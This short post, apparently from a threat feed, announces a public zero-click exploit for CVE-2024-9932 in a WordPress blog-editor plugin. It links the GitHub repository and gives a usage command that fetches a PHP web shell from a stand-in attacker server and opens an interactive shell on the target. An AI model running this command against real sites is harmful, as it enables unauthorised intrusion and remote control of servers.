
‼️ CVE-2024-9932: An unauthenticated arbitrary file upload vulnerability in the Wux Blog Editor WordPress plugin, leading to remote command execution (RCE). GitHub: https://github.com/JoshuaProvoste/0-click-RCE-Exploit-for-CVE-2024-9932 Type: 0-Click RCE Exploit Usage: python http://CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php After execution, the script uploads the payload, confirms its accessibility, detects the OS, and drops into an interactive shell.
Post summary
The CVE-2024-9932 vulnerability is exposed through a publicly available 0‑click RCE exploit on GitHub, with a Python script that uploads a payload and establishes an interactive shell on the vulnerable WordPress plugin.


